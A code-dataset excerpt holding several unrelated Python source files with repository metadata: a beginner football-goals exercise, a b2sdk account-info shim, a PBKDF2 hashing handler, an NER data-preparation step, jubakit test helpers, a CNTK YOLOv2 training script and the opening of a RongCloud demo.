2021-02-24T20:05:24.000Z
|
2021-02-24T20:05:41.000Z
|
parte 3/desafio93.py
|
BrunoSoares-DEV/Exercicios-python
|
fcfd0a7b3e2c6af2b7dd8e5a15ca6585c97f7c67
|
[
"MIT"
] | null | null | null |
parte 3/desafio93.py
|
BrunoSoares-DEV/Exercicios-python
|
fcfd0a7b3e2c6af2b7dd8e5a15ca6585c97f7c67
|
[
"MIT"
] | null | null | null |
jog = {}
#pegando dados
jog['Nome do jogador'] = str(input('Digite o nome do jogador: ')).strip().title()
jog['Total partidas'] = int(input('Quantas partidas jogou: '))
#lista de gol
gols = []
#Quantos gols em cada partida
for i in range(0, jog['Total partidas']):
gols.append(int(input(f'Quantos gols na partida {i}°: ')))
#total de gol
totGols = 0
for g in gols:
totGols += g
#print(totGols)
#adicionando dicionario
jog['Total gols'] = totGols
jog['Gols em partidas'] = gols
#print(jog)
#Mostrando resultados
print(f'O jogador: {jog["Nome do jogador"]}, jogou {jog["Total partidas"]} partidas e '
f'marcou ao todo no campeonato {jog["Total gols"]} gols')
print('Partidas:')
for pos, v in enumerate(gols):
print(f'Partida {pos}: {v} gols')
'''
Esse programa vai analisar informações de um jogador
Primeiro criamos um dicionário vazio, jog, e pedimos interações ao usuário como nome e total de partidas
É criado uma lista vazia chamada gols, e assim entra no loop for para saber quantos gols em cada partida, usando o limite de 0 e o valor de total de partidas
Para cada loop a lista gols da append() no valor
Assim é criado uma variavel de controle totGols zerada, e dentro do loop for, onde g iria rodar sobre gols
Onde totGols iria incrimentar g, somando todos os gols
Em seguida adicionamos ao dicionário, com o indice total de gols e gols em partidas, pelo totGols e gols respectivamente
No print será mostrado os resultados, e por fim um loop com pos e v rodando sobre o enumarete() de gols para mostrar cada gols nas partidas
'''
| 37.952381
| 161
| 0.717064
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,317
| 0.820561
|
c42d617d9e6dd57810d5d84da656ddd4e8d82bf1
| 5,891
|
py
|
Python
|
b2sdk/v1/account_info.py
|
ehossack/b2-sdk-python
|
034bec38671c0862b6956915993061359dbd51f6
|
[
"MIT"
] | null | null | null |
b2sdk/v1/account_info.py
|
ehossack/b2-sdk-python
|
034bec38671c0862b6956915993061359dbd51f6
|
[
"MIT"
] | null | null | null |
b2sdk/v1/account_info.py
|
ehossack/b2-sdk-python
|
034bec38671c0862b6956915993061359dbd51f6
|
[
"MIT"
] | null | null | null |
######################################################################
#
# File: b2sdk/v1/account_info.py
#
# Copyright 2021 Backblaze Inc. All Rights Reserved.
#
# License https://www.backblaze.com/using_b2_code.html
#
######################################################################
from abc import abstractmethod
import inspect
import logging
import os
from typing import Optional
from b2sdk import _v2 as v2
from b2sdk.account_info.sqlite_account_info import DEFAULT_ABSOLUTE_MINIMUM_PART_SIZE
from b2sdk.utils import limit_trace_arguments
logger = logging.getLogger(__name__)
# Retain legacy get_minimum_part_size and facilitate for optional s3_api_url
class OldAccountInfoMethods:
REALM_URLS = v2.REALM_URLS
@limit_trace_arguments(
only=[
'self',
'api_url',
'download_url',
'minimum_part_size',
'realm',
's3_api_url',
]
)
def set_auth_data(
self,
account_id,
auth_token,
api_url,
download_url,
minimum_part_size,
application_key,
realm,
allowed=None,
application_key_id=None,
s3_api_url=None,
):
if 's3_api_url' in inspect.getfullargspec(self._set_auth_data).args:
s3_kwargs = dict(s3_api_url=s3_api_url)
else:
s3_kwargs = {}
if allowed is None:
allowed = self.DEFAULT_ALLOWED
assert self.allowed_is_valid(allowed)
self._set_auth_data(
account_id=account_id,
auth_token=auth_token,
api_url=api_url,
download_url=download_url,
minimum_part_size=minimum_part_size,
application_key=application_key,
realm=realm,
allowed=allowed,
application_key_id=application_key_id,
**s3_kwargs,
)
# translate legacy "minimum_part_size" to new style "recommended_part_size"
class MinimumPartSizeTranslator:
def _set_auth_data(
self,
account_id,
auth_token,
api_url,
download_url,
minimum_part_size,
application_key,
realm,
s3_api_url=None,
allowed=None,
application_key_id=None
):
if 's3_api_url' in inspect.getfullargspec(super()._set_auth_data).args:
s3_kwargs = dict(s3_api_url=s3_api_url)
else:
s3_kwargs = {}
return super()._set_auth_data(
account_id=account_id,
auth_token=auth_token,
api_url=api_url,
download_url=download_url,
recommended_part_size=minimum_part_size,
absolute_minimum_part_size=DEFAULT_ABSOLUTE_MINIMUM_PART_SIZE,
application_key=application_key,
realm=realm,
allowed=allowed,
application_key_id=application_key_id,
**s3_kwargs,
)
def get_minimum_part_size(self):
return self.get_recommended_part_size()
class AbstractAccountInfo(OldAccountInfoMethods, v2.AbstractAccountInfo):
def get_s3_api_url(self):
"""
Return s3_api_url or raises MissingAccountData exception.
:rtype: str
"""
# Removed @abstractmethod decorators
def get_bucket_name_or_none_from_bucket_id(self, bucket_id: str) -> Optional[str]:
"""
Look up the bucket name for the given bucket id.
"""
# Removed @abstractmethod decorator
def get_recommended_part_size(self):
"""
Return the recommended number of bytes in a part of a large file.
:return: number of bytes
:rtype: int
"""
# Removed @abstractmethod decorator
def get_absolute_minimum_part_size(self):
"""
Return the absolute minimum number of bytes in a part of a large file.
:return: number of bytes
:rtype: int
"""
# Removed @abstractmethod decorator
@abstractmethod
def get_minimum_part_size(self):
"""
Return the minimum number of bytes in a part of a large file.
:return: number of bytes
:rtype: int
"""
# This stays abstract in v1
@abstractmethod
def _set_auth_data(
self, account_id, auth_token, api_url, download_url, minimum_part_size, application_key,
realm, s3_api_url, allowed, application_key_id
):
"""
Actually store the auth data. Can assume that 'allowed' is present and valid.
All of the information returned by ``b2_authorize_account`` is saved, because all of it is
needed at some point.
"""
# Keep the old signature
class InMemoryAccountInfo(MinimumPartSizeTranslator, OldAccountInfoMethods, v2.InMemoryAccountInfo):
pass
class UrlPoolAccountInfo(OldAccountInfoMethods, v2.UrlPoolAccountInfo):
pass
class SqliteAccountInfo(MinimumPartSizeTranslator, OldAccountInfoMethods, v2.SqliteAccountInfo):
def __init__(self, file_name=None, last_upgrade_to_run=None):
"""
If ``file_name`` argument is empty or ``None``, path from ``B2_ACCOUNT_INFO`` environment variable is used. If that is not available, a default of ``~/.b2_account_info`` is used.
:param str file_name: The sqlite file to use; overrides the default.
:param int last_upgrade_to_run: For testing only, override the auto-update on the db.
"""
# use legacy env var resolution, XDG not supported
file_name = file_name or os.environ.get(
v2.B2_ACCOUNT_INFO_ENV_VAR, v2.B2_ACCOUNT_INFO_DEFAULT_FILE
)
super().__init__(file_name=file_name, last_upgrade_to_run=last_upgrade_to_run)
class StubAccountInfo(MinimumPartSizeTranslator, OldAccountInfoMethods, v2.StubAccountInfo):
REALM_URLS = {'production': 'http://production.example.com'}
| 30.523316
| 186
| 0.636904
| 5,127
| 0.870311
| 0
| 0
| 1,873
| 0.317943
| 0
| 0
| 2,019
| 0.342726
|
c42ddcb403bc1b33c57898bd141f1f505a69b04f
| 9,539
|
py
|
Python
|
src/pyrin/security/hashing/handlers/pbkdf2.py
|
wilsonGmn/pyrin
|
25dbe3ce17e80a43eee7cfc7140b4c268a6948e0
|
[
"BSD-3-Clause"
] | null | null | null |
src/pyrin/security/hashing/handlers/pbkdf2.py
|
wilsonGmn/pyrin
|
25dbe3ce17e80a43eee7cfc7140b4c268a6948e0
|
[
"BSD-3-Clause"
] | null | null | null |
src/pyrin/security/hashing/handlers/pbkdf2.py
|
wilsonGmn/pyrin
|
25dbe3ce17e80a43eee7cfc7140b4c268a6948e0
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
pbkdf2 hashing handler module.
"""
import hashlib
import re
import pyrin.configuration.services as config_services
import pyrin.security.utils.services as security_utils_services
from pyrin.security.hashing.decorators import hashing
from pyrin.security.hashing.handlers.base import HashingBase
from pyrin.security.hashing.handlers.exceptions import InvalidHashingRoundsCountError, \
InvalidPBKDF2InternalAlgorithmError, InvalidHashingSaltLengthError
@hashing()
class PBKDF2Hashing(HashingBase):
"""
pbkdf2 hashing class.
"""
# regular expression to validate format of full hashed values.
# the following format will be matched:
# `$handler_name$internal_algorithm$rounds$salt_length$salt-text_plus_salt_hash`
FORMAT_REGEX = re.compile(r'^\$PBKDF2\$[^$]+\$[\d]+\$[\d]+\$(.+)$')
def __init__(self, **options):
"""
initializes an instance of PBKDF2Hashing.
"""
super().__init__(**options)
def _generate_hash(self, text, **options):
"""
gets the hash of input text using a random or specified salt.
:param str text: text to be hashed.
:keyword bytes salt: salt to be used for hashing.
if not provided, a random salt will be generated
considering `salt_length` option.
:keyword str internal_algorithm: internal algorithm to be used
for hashing. if not provided,
default value from relevant
config will be used.
:keyword int rounds: rounds to perform for generating hash.
if not provided, default value from
relevant config will be used.
:keyword int salt_length: salt length to be used for hashing.
if `salt` option is provided, then
this value will be ignored.
if not provided, default value from
relevant config will be used.
:rtype: bytes
"""
internal_algorithm, rounds, salt_length = self._extract_attributes(**options)
self._validate_attributes(internal_algorithm, rounds, salt_length)
salt = options.get('salt', None)
if salt is None:
salt = self._generate_salt(length=salt_length)
text_hash = hashlib.pbkdf2_hmac(internal_algorithm,
text.encode(self._encoding),
salt,
rounds)
return self._make_final_hash(internal_algorithm, rounds, salt, text_hash)
def _generate_salt(self, **options):
"""
generates a valid salt for this handler and returns it.
:keyword int length: length of generated salt in bytes.
if not provided, default value from
relevant config will be used.
:rtype: bytes
"""
salt_length = options.get('length', config_services.get('security', 'hashing',
'pbkdf2_salt_length'))
return security_utils_services.get_bytes(length=salt_length)
def _is_match(self, text, hashed_value, **options):
"""
gets a value indicating that given text's
hash is identical to given hashed value.
:param str text: text to be hashed.
:param bytes hashed_value: hashed value to compare with.
:rtype: bool
"""
internal_algorithm, rounds, salt, text_hash = \
self._extract_parts_from_final_hash(hashed_value, **options)
new_full_hashed_value = self._generate_hash(text,
internal_algorithm=internal_algorithm,
rounds=rounds, salt=salt)
return hashed_value == new_full_hashed_value
def _get_algorithm(self, **options):
"""
gets the hashing algorithm.
:rtype: str
"""
return 'PBKDF2'
def _get_separator_count(self):
"""
gets the separator count used between parts of this handler's hashed result.
:rtype: int
"""
return 5
def _extract_attributes(self, **options):
"""
extracts the required attributes for this handler from input
keyword arguments. if not available, gets the default
values from relevant configs.
:keyword str internal_algorithm: internal algorithm to be used
for hashing. if not provided,
default value from relevant
config will be used.
:keyword int rounds: rounds to perform for generating hash.
if not provided, default value from
relevant config will be used.
:keyword int salt_length: salt length to be used for hashing.
if not provided, default value from
relevant config will be used.
:returns: tuple[str internal_algorithm, int rounds, int salt_length]
:rtype: tuple[str, int, int]
"""
internal_algorithm = options.get('internal_algorithm',
config_services.get('security', 'hashing',
'pbkdf2_internal_algorithm'))
rounds = options.get('rounds', config_services.get('security', 'hashing',
'pbkdf2_rounds'))
salt_length = options.get('salt_length', config_services.get('security', 'hashing',
'pbkdf2_salt_length'))
return internal_algorithm, rounds, salt_length
def _validate_attributes(self, internal_algorithm, rounds, salt_length):
"""
validates the given inputs for hash generation.
it will raise an error on invalid inputs.
:param str internal_algorithm: internal algorithm to be used for hashing.
:param int rounds: rounds to perform for generating hash.
:param int salt_length: salt length to be used for hashing.
:raises InvalidPBKDF2InternalAlgorithmError: invalid pbkdf2 internal algorithm error.
:raises InvalidHashingRoundsCountError: invalid hashing rounds count error.
:raises InvalidHashingSaltLengthError: invalid hashing salt length error.
"""
if internal_algorithm not in hashlib.algorithms_guaranteed:
raise InvalidPBKDF2InternalAlgorithmError('Internal algorithm [{algorithm}] '
'is invalid.'
.format(algorithm=internal_algorithm))
if rounds < 1:
raise InvalidHashingRoundsCountError('Hashing rounds [{rounds}] is invalid.'
.format(rounds=rounds))
if salt_length < 1:
raise InvalidHashingSaltLengthError('Salt length [{length}] is invalid.'
.format(length=salt_length))
def _make_final_hash(self, internal_algorithm, rounds, salt, text_hash):
"""
makes final hash from input values and returns it.
:param str internal_algorithm: internal algorithm to be used for hashing.
:param int rounds: rounds to perform for generating hash.
:param bytes salt: salt to be used for hashing.
:param bytes text_hash: hash value of text and salt.
:rtype: bytes
"""
return self._get_separator() + self._get_separator().join(
(self._get_algorithm().encode(self._encoding),
internal_algorithm.encode(self._encoding),
str(rounds).encode(self._encoding),
str(len(salt)).encode(self._encoding),
self._encode_hash_part(salt + text_hash)))
def _extract_parts_from_final_hash(self, full_hashed_value, **options):
"""
extracts different parts of given full hashed value.
:param bytes full_hashed_value: full hashed value to extract it's parts.
:returns: tuple[str internal_algorithm, int rounds, bytes salt, bytes text_hash]
:rtype: tuple[str, int, bytes, bytes]
"""
empty, handler, internal_algorithm, rounds, salt_length, salt_plus_text_hash = \
full_hashed_value.split(self._get_separator(), self._get_separator_count())
salt_length = int(salt_length)
raw_salt_plus_text_hash = self._decode_hash_part(salt_plus_text_hash)
salt = raw_salt_plus_text_hash[:salt_length]
text_hash = raw_salt_plus_text_hash[salt_length:]
return internal_algorithm.decode(self._encoding), int(rounds), salt, text_hash
def _get_hashed_part(self, full_hashed_value, **options):
"""
gets the hashed part from full hashed value which current handler understands it.
this handler returns the same input value as result.
:param bytes full_hashed_value: full hashed value to get hashed part from it.
:rtype: bytes
"""
return full_hashed_value
| 39.094262
| 93
| 0.588636
| 9,040
| 0.947688
| 0
| 0
| 9,051
| 0.948842
| 0
| 0
| 5,117
| 0.536429
|
c42e18634a20b6733cded46ea5994450f7ae4da0
| 8,652
|
py
|
Python
|
src/steps/prepare_ner_data.py
|
allanwright/media-classifier
|
a0da0799cc0bd6ef7360012c362f9fab273286c6
|
[
"MIT"
] | 2
|
2019-08-16T00:49:27.000Z
|
2021-08-15T16:37:45.000Z
|
src/steps/prepare_ner_data.py
|
allanwright/media-classifier
|
a0da0799cc0bd6ef7360012c362f9fab273286c6
|
[
"MIT"
] | 1
|
2020-02-19T10:17:56.000Z
|
2020-07-26T09:42:49.000Z
|
src/steps/prepare_ner_data.py
|
allanwright/media-classifier
|
a0da0799cc0bd6ef7360012c362f9fab273286c6
|
[
"MIT"
] | 1
|
2019-06-27T10:57:07.000Z
|
2019-06-27T10:57:07.000Z
|
'''Defines a pipeline step which prepares training and test data for
named entity recognition.
'''
import ast
import json
import pickle
from mccore import EntityRecognizer
from mccore import ner
from mccore import persistence
import pandas as pd
from sklearn.utils import resample
from src.step import Step
class PrepareNerData(Step):
'''Defines a pipeline step which prepares training and test data for
named entity recognition.
'''
def __init__(self):
super(PrepareNerData, self).__init__()
self.input = {
'processed': 'data/interim/processed.csv',
'ner_labelled_csv': 'data/interim/ner_labelled.csv',
}
self.output = {
'stacked': 'data/interim/stacked.csv',
'ner_labelled_tsv': 'data/interim/ner_labelled.tsv',
'ner_labelled_json': 'data/interim/ner_labelled.json',
'ner_labelled_pickle': 'data/processed/ner_labelled.pickle',
}
def run(self):
'''Runs the pipeline step.
'''
# Process data for named entity recognition labelling
self.__process_data_for_ner()
# Process labelled named entity recognition data (if any)
self.__process_labelled_ner_data()
def __process_data_for_ner(self):
df = pd.read_csv(self.input['processed'])
self.print('Processing data for named entity recognition ({rows} rows)', rows=df.shape[0])
# Drop anything other than movies and tv shows
categories = [1, 2]
df = df[df['category'].isin(categories)]
# Drop subtitle files
df.drop(df[df['ext'] == 'srt'].index, inplace=True)
# Drop anything that contains unwanted words
blacklist = [
'tamilrockers',
'www',
'hindi',
'Ã',
'ita',
'french',
'spa',
'torrent9',
'torrentcounter',
'ssrmovies',
'rus',
'bengali',
]
def contains_blacklisted_word(name):
for word in name.split():
if word in blacklist:
return True
return False
df['blacklisted'] = df['name'].apply(contains_blacklisted_word)
df.drop(df[df['blacklisted']].index, inplace=True)
# Downsample to a number of files that is reasonable enough for
# human verification of the labels provided by the ner model
self.print('Downsampling dataset ({rows} rows)', rows=df.shape[0])
categories = [df[df.category == c] for c in df.category.unique()]
downsampled = [resample(c,
replace=False,
n_samples=250,
random_state=123) for c in categories]
df = pd.concat(downsampled)
df['entities'] = ''
nlp, _ = ner.get_model()
nlp_bytes = persistence.bin_to_obj('models/ner_mdl.pickle')
nlp.from_bytes(nlp_bytes)
recognizer = EntityRecognizer(nlp)
def get_entities(name):
return str(list(recognizer.predict(name)))
df['entities'] = df['name'].apply(get_entities)
# Split the filename into individual words then stack the DataFrame
self.print('Stacking dataset ({rows} rows)', rows=df.shape[0])
index = [df.index, df.name, df.category, df.entities]
df = pd.DataFrame(df['name'].str.split().tolist(), index=index).stack()
df = df.reset_index()
df.columns = ['index', 'name', 'category', 'entities', 'pos', 'word']
# Add entity column
df['entity'] = ''
def get_entity(row):
entities = ast.literal_eval(row['entities'])
word = row['word'].upper()
for i in entities:
if word in (str(s).upper() for s in str(i[1]).split()):
return i[0]
return ''
df['entity'] = df.apply(get_entity, axis=1)
df.drop(columns=['category', 'entities'], inplace=True)
# Save interim stacked output before processing further
df.to_csv(self.output['stacked'], index=False)
def __process_labelled_ner_data(self):
df = pd.read_csv(self.input['ner_labelled_csv'])
# Keep only word and corresponding label
df = df[['word', 'entity']]
# Save to tsv
df.to_csv(
self.output['ner_labelled_tsv'],
sep='\t',
header=False,
index=False)
# Convert from tsv to json
self.__tsv_to_json_format(
self.output['ner_labelled_tsv'],
self.output['ner_labelled_json'],
'na')
# Write out spacy file
self.__write_spacy_file(
self.output['ner_labelled_json'],
self.output['ner_labelled_pickle'])
def __tsv_to_json_format(self, input_path, output_path, unknown_label):
try:
input_file = open(input_path, 'r') # input file
output_file = open(output_path, 'w') # output file
data_dict = {}
annotations = []
label_dict = {}
words = ''
start = 0
for line in input_file:
word, entity = line.split('\t')
words += word + " "
entity = entity[:len(entity)-1]
if entity != unknown_label:
if len(entity) != 1:
d = {}
d['text'] = word
d['start'] = start
d['end'] = start+len(word) - 1
try:
label_dict[entity].append(d)
except:
label_dict[entity] = []
label_dict[entity].append(d)
start += len(word) + 1
if entity == 'extension':
data_dict['content'] = words
words = ''
label_list = []
for ents in list(label_dict.keys()):
for i in range(len(label_dict[ents])):
if label_dict[ents][i]['text'] != '':
l = [ents, label_dict[ents][i]]
for j in range(i + 1, len(label_dict[ents])):
if label_dict[ents][i]['text'] == label_dict[ents][j]['text']:
di = {}
di['start'] = label_dict[ents][j]['start']
di['end'] = label_dict[ents][j]['end']
di['text'] = label_dict[ents][i]['text']
l.append(di)
label_dict[ents][j]['text'] = ''
label_list.append(l)
for entities in label_list:
label = {}
label['label'] = [entities[0]]
label['points'] = entities[1:]
annotations.append(label)
data_dict['annotation'] = annotations
annotations = []
json.dump(data_dict, output_file)
output_file.write('\n')
data_dict = {}
start = 0
label_dict = {}
except Exception as e:
print("Unable to process file" + "\n" + "error = " + str(e))
return None
def __write_spacy_file(self, input_file=None, output_file=None):
try:
training_data = []
lines = []
with open(input_file, 'r') as f:
lines = f.readlines()
for line in lines:
data = json.loads(line)
text = data['content']
entities = []
for annotation in data['annotation']:
point = annotation['points'][0]
labels = annotation['label']
if not isinstance(labels, list):
labels = [labels]
for label in labels:
entities.append((point['start'], point['end'] + 1, label))
training_data.append((text, {"entities" : entities}))
with open(output_file, 'wb') as fp:
pickle.dump(training_data, fp)
except Exception as e:
print("Unable to process " + input_file + "\n" + "error = " + str(e))
return None
| 36.05
| 98
| 0.496417
| 8,340
| 0.963828
| 0
| 0
| 0
| 0
| 0
| 0
| 2,014
| 0.232752
|
c42e658ca9b791acfc8cc494fe87a5ee5b2f994f
| 1,006
|
py
|
Python
|
jubakit/test/__init__.py
|
vishalbelsare/jubakit
|
f6252ba627ce4e2e42eb9aafaaf05c882bc1c678
|
[
"MIT"
] | 12
|
2016-04-11T04:49:08.000Z
|
2019-02-08T01:43:46.000Z
|
jubakit/test/__init__.py
|
vishalbelsare/jubakit
|
f6252ba627ce4e2e42eb9aafaaf05c882bc1c678
|
[
"MIT"
] | 138
|
2016-04-11T05:57:48.000Z
|
2020-09-26T03:09:31.000Z
|
jubakit/test/__init__.py
|
vishalbelsare/jubakit
|
f6252ba627ce4e2e42eb9aafaaf05c882bc1c678
|
[
"MIT"
] | 10
|
2016-04-11T03:18:45.000Z
|
2018-04-14T10:11:15.000Z
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
__all__ = ['requireSklearn']
from jubakit.compat import PYTHON3
try:
import embedded_jubatus
embedded_available = True
except ImportError:
embedded_available = False
try:
import numpy
import scipy
import sklearn
sklearn_available = True
except ImportError:
sklearn_available = False
try:
from unittest import skipUnless
def requireSklearn(target):
return skipUnless(sklearn_available, 'requires scikit-learn')(target)
def requirePython3(target):
return skipUnless(PYTHON3, 'requires Python 3.x')(target)
def requireEmbedded(target):
return skipUnless(embedded_available, 'requires embedded_jubatus')(target)
except ImportError:
def requireSklearn(target):
return target if sklearn_available else None
def requirePython3(target):
return target if PYTHON3 else None
def requireEmbedded(target):
return target if embedded_available else None
| 26.473684
| 82
| 0.777336
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 110
| 0.109344
|
c42e88219fc65a0c84a4b46fac98f1c167ea84ef
| 9,859
|
py
|
Python
|
YoLo2Net.py
|
zhouyc2002/yolo2-cntk
|
549cb46365d1750031eee90044b6262f9b94ff49
|
[
"Apache-2.0"
] | 3
|
2017-07-27T00:05:39.000Z
|
2021-02-25T08:56:10.000Z
|
YoLo2Net.py
|
zhouyc2002/yolo2-cntk
|
549cb46365d1750031eee90044b6262f9b94ff49
|
[
"Apache-2.0"
] | 1
|
2019-08-05T12:55:06.000Z
|
2019-08-06T00:43:58.000Z
|
YoLo2Net.py
|
zhouyc2002/yolo2-cntk
|
549cb46365d1750031eee90044b6262f9b94ff49
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Wed Jun 28 13:03:05 2017
@author: ZHOU Yuncheng
"""
import cntk as C
import _cntk_py
import cntk.layers
import cntk.initializer
import cntk.losses
import cntk.metrics
import cntk.logging
import cntk.io.transforms as xforms
import cntk.io
import cntk.train
import os
import numpy as np
import yolo2
import CloneModel
# default Paths relative to current python file.
abs_path = os.path.dirname(os.path.abspath(__file__))
model_path = os.path.join(abs_path, "Models")
# model dimensions
image_height = 416
image_width = 416
num_channels = 3 # RGB
num_truth_boxes = 14
box_dim = 5 # centerX, centerY, Width, Height, class_type
num_classes = 3 # object type count. i.e. tomato, flower, stem, et, al.
num_anchors = 5
model_name = "Yolo2Net.model"
# Create a minibatch source.
def create_image_mb_source(image_file, rois_file, is_training, total_number_of_samples):
if not os.path.exists(image_file):
raise RuntimeError("File '%s' does not exist." %image_file)
if not os.path.exists(rois_file):
raise RuntimeError("File '%s' does not exist." %rois_file)
# transformation pipeline for the features has jitter/crop only when training
transforms = [xforms.scale(width=image_width, height=image_height,
channels=num_channels, interpolations='linear')]
if is_training:
transforms += [
xforms.color(brightness_radius=0.2, contrast_radius=0.2, saturation_radius=0.2)
]
# deserializer
imageReader = cntk.io.ImageDeserializer(image_file,
cntk.io.StreamDefs(
features=cntk.io.StreamDef(field='image', transforms=transforms),
ignored=cntk.io.StreamDef(field='label', shape=1)))
txtReader = cntk.io.CTFDeserializer(rois_file,
cntk.io.StreamDefs(
rois=cntk.io.StreamDef(field='rois',shape=num_truth_boxes*box_dim)))
return cntk.io.MinibatchSource([imageReader, txtReader],
randomize=is_training,
max_samples=total_number_of_samples,
multithreaded_deserializer=True)
# Create the network.
def create_yolo2net(anchor_dims = None):
# Input variables denoting the features and label data
feature_var = C.input_variable((num_channels, image_height, image_width))
label_var = C.input_variable((num_truth_boxes, box_dim))
net = CloneModel.CloneModel('Models/DarkNet.model', 'mean_removed_input', 'bn6e',
cntk.ops.functions.CloneMethod.clone, feature_var)
det1 = cntk.layers.layers.Convolution2D((3,3), 1024,
init=cntk.initializer.he_normal(), pad=True,
activation=cntk.ops.leaky_relu,
name='det1')(net)
detbn1 = cntk.layers.BatchNormalization(map_rank=1, name='detbn1')(det1)
det2 = cntk.layers.layers.Convolution2D((3,3), 1024,
init=cntk.initializer.he_normal(), pad=True,
activation=cntk.ops.leaky_relu,
name='det2')(detbn1)
detbn2 = cntk.layers.BatchNormalization(map_rank=1, name='detbn2')(det2)
det3 = cntk.layers.layers.Convolution2D((3,3), 1024,
init=cntk.initializer.he_normal(), pad = True,
activation=cntk.ops.leaky_relu,
name='det3')(detbn2)
detbn3 = cntk.layers.BatchNormalization(map_rank=1, name='detbn3')(det3)
z = cntk.layers.layers.Convolution2D((1,1), (5+num_classes) * num_anchors,
init=cntk.initializer.normal(0.01), pad = True,
name='output')(detbn3)
# loss and metric
ce = C.user_function(yolo2.Yolo2Error(z, label_var, class_size = num_classes, priors = anchor_dims))
pe = C.user_function(yolo2.Yolo2Metric(z, label_var, class_size = num_classes, priors = anchor_dims,
metricMethod = yolo2.Yolo2MetricMethod.Avg_iou))
cntk.logging.log_number_of_parameters(z) ; print()
return {
'feature': feature_var,
'label': label_var,
'ce' : ce,
'pe' : pe,
'output': z
}
# Create trainer
def create_trainer(network, epoch_size, num_quantization_bits, printer, block_size, warm_up):
# Set learning parameters
lr_per_mb = [0.001]*25 + [0.0001]*25 + [0.00001]*25 + [0.000001]*25 + [0.0000001]
lr_schedule = C.learning_rate_schedule(lr_per_mb, unit=C.learners.UnitType.minibatch, epoch_size=epoch_size)
mm_schedule = C.learners.momentum_schedule(0.9)
l2_reg_weight = 0.0005 # CNTK L2 regularization is per sample, thus same as Caffe
if block_size != None and num_quantization_bits != 32:
raise RuntimeError("Block momentum cannot be used with quantization, please remove quantized_bits option.")
# Create learner
local_learner = C.learners.momentum_sgd(network['output'].parameters, lr_schedule, mm_schedule, unit_gain=False, l2_regularization_weight=l2_reg_weight)
# Since we reuse parameter settings (learning rate, momentum) from Caffe, we set unit_gain to False to ensure consistency
# Create trainer
if block_size != None:
parameter_learner = cntk.train.distributed.block_momentum_distributed_learner(local_learner, block_size=block_size)
else:
parameter_learner = cntk.train.distributed.data_parallel_distributed_learner(local_learner, num_quantization_bits=num_quantization_bits, distributed_after=warm_up)
return C.Trainer(network['output'], (network['ce'], network['pe']), parameter_learner, printer)
# Train and test
def train_and_test(network, trainer, train_source, test_source, minibatch_size, epoch_size, restore):
# define mapping from intput streams to network inputs
input_map = {
network['feature']: train_source.streams.features,
network['label']: train_source.streams.rois
}
# Train all minibatches
cntk.train.training_session(
trainer=trainer, mb_source = train_source,
model_inputs_to_streams = input_map,
mb_size = minibatch_size,
progress_frequency=epoch_size,
checkpoint_config = C.CheckpointConfig(filename=os.path.join(model_path, model_name), restore=restore),
test_config= C.TestConfig(test_source, minibatch_size=minibatch_size)
).train()
# Train and evaluate the network.
def net_train_and_eval(train_data, train_rois, test_data, test_rois,
priors = None,
num_quantization_bits=32,
block_size=3200, warm_up=0,
minibatch_size=1,
epoch_size = 1281167,
max_epochs=1,
restore=True,
log_to_file=None,
num_mbs_per_log=None,
gen_heartbeat=True):
_cntk_py.set_computation_network_trace_level(0)
log_printer = cntk.logging.progress_print.ProgressPrinter(
freq=1,
tag='Training',
log_to_file = os.path.join(model_path, log_to_file),
num_epochs=max_epochs)
progress_printer = cntk.logging.progress_print.ProgressPrinter(freq=1, tag='Training',
num_epochs=max_epochs,test_freq=1)
network = create_yolo2net(priors)
trainer = create_trainer(network, epoch_size, num_quantization_bits,
[progress_printer, log_printer], block_size, warm_up)
train_source = create_image_mb_source(train_data, train_rois, True,
total_number_of_samples=max_epochs * epoch_size)
train_source
test_source = create_image_mb_source(test_data, train_rois, False,
total_number_of_samples=cntk.io.FULL_DATA_SWEEP)
train_and_test(network,
trainer,
train_source,
test_source,
minibatch_size,
epoch_size,
restore)
#
# get train sample size evaluate sample size
#
def get_sample_counts(train_file, test_file):
counts = [0, 0]
if os.path.exists(train_file):
ff = open(train_file)
counts[0] = len(ff.readlines())
ff.close()
if os.path.exists(test_file):
ff = open(test_file)
counts[1] = len(ff.readlines())
ff.close()
return counts
def open_anchor_file(anchor_file):
anchors = []
file = open(anchor_file)
lines = file.readlines()
for line in lines:
if len(line.strip()) > 0:
dims = line.strip().split("\t")
anchors.append([float(dims[0]), float(dims[1])])
file.close()
return np.array(anchors).astype(np.float32)
if __name__=='__main__':
anchor_data = 'anchor.txt'
if not os.path.exists(anchor_data):
raise RuntimeError("File '%s' does not exist." %anchor_data)
anchors = open_anchor_file(anchor_data)
if anchors.shape[0] < num_anchors:
raise RuntimeError("Anchor dimension is less than %s" %num_anchors)
# network = create_yolo2net(anchors)
# cntk.logging.graph.plot(network['output'], 'yolo2.png')
train_data = 'train.txt'
train_rois = 'train.rois.txt'
test_data = 'train.txt'
test_rois = 'train.rois.txt'
sample_size = get_sample_counts(train_data, test_data)
net_train_and_eval(train_data, train_rois, test_data, test_rois,
priors = anchors,
epoch_size=sample_size[0],
block_size = None,
minibatch_size = 32,
max_epochs = 130,
log_to_file = 'Yolo2Net.log')
# Must call MPI finalize when process exit without exceptions
cntk.train.distributed.Communicator.finalize()
| 39.436
| 171
| 0.647733
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,602
| 0.162491
|
c42f5f63c17465e80eb4449fa0bfca6ef5e47655
| 948
|
py
|
Python
|
hqq_tool/rongcloud/demo.py
|
yaoruda/DRFLearning
|
6b17ef0d557142e8563d80788351f8b7ab94f248
|
[
"MIT"
] | 1
|
2018-09-21T09:42:02.000Z
|
2018-09-21T09:42:02.000Z
|
hqq_tool/rongcloud/demo.py
|
yaoruda/DRFLearning
|
6b17ef0d557142e8563d80788351f8b7ab94f248
|
[
"MIT"
] | null | null | null |
hqq_tool/rongcloud/demo.py
|
yaoruda/DRFLearning
|
6b17ef0d557142e8563d80788351f8b7ab94f248
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# __author__= "Ruda"
# Date: 2018/10/16
'''
import os
from rongcloud import RongCloud
app_key = os.environ['APP_KEY']
app_secret = os.environ['APP_SECRET']
rcloud = RongCloud(app_key, app_secret)
